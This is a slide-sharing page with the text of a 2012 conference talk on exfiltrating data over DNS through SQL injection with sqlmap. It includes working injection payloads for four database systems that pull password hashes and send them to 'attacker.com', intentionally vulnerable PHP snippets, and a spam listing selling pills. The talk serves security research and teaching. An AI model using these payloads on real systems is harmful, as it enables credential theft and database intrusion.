sqlmap internals
 
Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?
 
Improving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseImproving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic Denoise
 
APT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureAPT Attacks on Critical Infrastructure
APT Attacks on Critical Infrastructure
 
WARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsWARNING: Do Not Feed the Bears
WARNING: Do Not Feed the Bears
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and Now
 

Recently uploaded

Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingEdi Saputra
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Principled Technologies
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024The Digital Insurer
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesBoston Institute of Analytics
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 

Recently uploaded (20)

Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 

DNS exfiltration using sqlmap

  • 1. DNS exfiltration using sqlmap Miroslav Štampar (dev@sqlmap.org)
  • 2. What is SQL injection? “SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of DBMS server for parsing and execution” (source: msdn.microsoft.com) PHDays 2012, Moscow (Russia) May 31, 2012 2
  • 3. What is SQL injection? (2)  In plain speak, SQL injection is all about the unauthorized database access  “Hello World” vulnerable code example (PHP/MySQL):     $sql = "SELECT * FROM events WHERE id = " .  $_GET["id"];     $result = mysql_query($sql);  Sample attack:   http://www.target.com/vuln.php?id=1 AND (SELECT 5502 FROM(SELECT COUNT(*),CONCAT(0x3a, (SELECT password FROM mysql.user LIMIT  0,1),0x3a,FLOOR(RAND(0)*2))x FROM  INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) PHDays 2012, Moscow (Russia) May 31, 2012 3
  • 4. What is SQL injection? (3)  Harder example (PHP/MySQL):     error_reporting(0);     set_magic_quotes_runtime(true);     $sql=”INSERT INTO Users (FirstName, LastName,  Age) VALUES  ('$_REQUEST[firstname]','$_REQUEST[lastname]', $_REQUEST[age])”;     @mysql_query($sql); PHDays 2012, Moscow (Russia) May 31, 2012 4
  • 5. Technique classification  Inband (web page as channel) Union  Full  Partial Error-based  Inference (bit-by-bit) Boolean-based blind Time-based (and stacked queries)  Out-of-band (alternative transport channels) HTTP DNS PHDays 2012, Moscow (Russia) May 31, 2012 5
  • 6. Inband techniques  Error-based – CONVERT(INT,(<subquery>)), fast, 1 (sub)query result per request, based on inclusion of subquery result(s) inside DBMS error message  Union – UNION ALL SELECT NULL,...,  (<subquery>),NULL,NULL,..., fastest, in FULL variant whole table dump per request, in PARTIAL variant 1 query result per request PHDays 2012, Moscow (Russia) May 31, 2012 6
  • 7. Inference techniques  Boolean-based blind – AND 1=1, slow, 1 bit per request, page differentiation based, low difference ratio represents True response, False otherwise (in most common cases)  Time-based – AND 1=IF(2>1,  BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,1 12))),0), slowest, 1 bit per request, delay represents True response, False otherwise  Stacked queries – ;INSERT INTO users VALUES  (10, 'test', 'testpass'), usually time-based data retrieval PHDays 2012, Moscow (Russia) May 31, 2012 7
  • 8. Out-of-band (OOB) techniques  HTTP – AND LENGTH(UTL_HTTP.REQUEST  ('http://www.attacker.com/log.php?q='|| (SELECT password FROM SYS.USER$ WHERE  name='SYS')))>0, fast, 1 (sub)query result per request, capturing/logging HTTP requests at the other side  DNS – AND LENGTH(UTL_INADDR.  GET_HOST_ADDRESS((SELECT password FROM  SYS.USER$ WHERE  name='SYS')||'.attacker.com'))>0, relatively fast, 1 part of (sub)query result per request, capturing/logging DNS requests at the other side PHDays 2012, Moscow (Russia) May 31, 2012 8
  • 9. DNS protocol  relatively simple protocol  resolving domain names  UDP datagrams (except zone transfers which use TCP)  forwarding requests for arbitrary domain names  ...even if access to public networks is not allowed :) PHDays 2012, Moscow (Russia) May 31, 2012 9
  • 10. DNS protocol (2)  Name resolving methods: Client lookup – checking local client's cache (same request already occurred) Iterative – checking DNS server's cache and configured zone records Recursive – if other methods fail, query is forwarded to others, sending back retrieved results to client PHDays 2012, Moscow (Russia) May 31, 2012 10
  • 11. DNS protocol (3) PHDays 2012, Moscow (Russia) May 31, 2012 11
  • 12. DNS exfiltration “Exfiltration [eks-fil-treyt, eks-fil-treyt] 1. verb (used without object) to escape furtively from an area under enemy control 2. verb (used with object) to smuggle out of an area under enemy control” (source: dictionary.reference.com) PHDays 2012, Moscow (Russia) May 31, 2012 12
  • 13. DNS exfiltration (2)  When fast inband techniques fail data is (usually) extracted in a bit-by-bit manner  Most attackers will avoid exploitation of targets with time-based technique  Non-query SQL statements like INSERT/UPDATE/DELETE are especially problematic  Alternative methods are more than welcome (e.g. uploading of web shell scripts)  OOB techniques are rarely used (till now) PHDays 2012, Moscow (Russia) May 31, 2012 13
  • 14. DNS exfiltration (3)  In some cases it's possible to incorporate SQL (sub)query results into DNS resolution requests  Any function that accepts network address could be used  Microsoft SQL Server, Oracle, MySQL and PostgreSQL  Potentially dozens of resulting characters can be transferred per single request PHDays 2012, Moscow (Russia) May 31, 2012 14
  • 15. DNS exfiltration (4)  Microsoft SQL Server:     DECLARE @host varchar(1024);     SELECT @host=(SELECT TOP 1  master.dbo.fn_varbintohexstr(password_hash) FROM  sys.sql_logins WHERE name='sa')+'.attacker.com';     EXEC('master..xp_dirtree "'+@host+'c$"'); PHDays 2012, Moscow (Russia) May 31, 2012 15
  • 16. DNS exfiltration (5)  Oracle:     SELECT DBMS_LDAP.INIT((SELECT password FROM  SYS.USER$ WHERE name='SYS')||'.attacker.com',80)  FROM DUAL;  MySQL:     SELECT LOAD_FILE(CONCAT('',(SELECT  password FROM mysql.user WHERE user='root' LIMIT  1),'.attacker.comfoobar')); PHDays 2012, Moscow (Russia) May 31, 2012 16
  • 17. DNS exfiltration (6)  PostgreSQL:     DROP TABLE IF EXISTS table_output;     CREATE TABLE table_output(content text);     CREATE OR REPLACE FUNCTION temp_function()     RETURNS VOID AS $$     DECLARE exec_cmd TEXT;     DECLARE query_result TEXT;     BEGIN         SELECT INTO query_result (SELECT passwd FROM pg_shadow WHERE  usename='postgres');         exec_cmd := E'COPY table_output(content) FROM E''|| query_result||E'.attacker.comfoobar.txt'';         EXECUTE exec_cmd;     END;     $$ LANGUAGE plpgsql SECURITY DEFINER;     SELECT temp_function(); PHDays 2012, Moscow (Russia) May 31, 2012 17
  • 18. DNS exfiltration (7) PHDays 2012, Moscow (Russia) May 31, 2012 18
  • 19. DNS exfiltration (8) PHDays 2012, Moscow (Russia) May 31, 2012 19
  • 20. Integration into sqlmap  New command line option: --dns-domain Turning on DNS exfiltration support Domain where should provoked DNS requests point to (e.g. --dns-domain=attacker.com)  DNS exfiltration vectors sent through previously detected SQLi (e.g. time-based)  Inband techniques have automatically higher priority  Hence, usable only in inference-only cases PHDays 2012, Moscow (Russia) May 31, 2012 20
  • 21. Integration into sqlmap (2)  Domain name server entry (e.g. ns1.attacker.com) has to point to IP address of machine running sqlmap sqlmap being run as a fake DNS server Serving and logging all incoming DNS requests Dummy responses (e.g. 127.0.0.1) sent just to unblock web server instance PHDays 2012, Moscow (Russia) May 31, 2012 21
  • 22. Integration into sqlmap (3)  Each pushed result enclosed with unique prefix and suffix (e.g. Xzk. … .iUR.attacker.com) Cancelling caching mechanisms Easy to match SQLi requests with DNS results  Complying with RFC 1034 (Domain Names – Concepts and Facilities) Hex encoding results to preserve non-word chars Splitting long items to parts of length 63 (maximum length of one label name) Otherwise DNS resolution requests are immediately dropped as invalid (no resolution) PHDays 2012, Moscow (Russia) May 31, 2012 22
  • 23. Experimental setup 1)Attacker (172.16.138.1) ➢ physical machine – Ubuntu 12.04 LTS 64-bit OS ➢ sqlmap v1.0-dev (r5100) 2)Web Server (172.16.138.129) ➢ virtual machine – Windows XP 32-bit SP1 OS ➢ XAMPP 1.7.3 with SQLi vulnerable MySQL/PHP web application 3)DNS Server (172.16.138.130) ➢ virtual machine – CentOS 6.2 64-bit OS ➢ BIND9 DNS daemon PHDays 2012, Moscow (Russia) May 31, 2012 23
  • 24. Results (--dump -T COLLATIONS -D information_schema) Method # of requests Time (sec) Boolean-based blind 29,212 214.04 Time-based (1 sec) 32,716 17,720.51 Error-based 777 9.02 Union (full/partial) 3/136 0.70/2.50 DNS exfiltration 1,409 35.31 PHDays 2012, Moscow (Russia) May 31, 2012 24
  • 25. Video presentation PHDays 2012, Moscow (Russia) May 31, 2012 25
  • 26. Questions? PHDays 2012, Moscow (Russia) May 31, 2012 26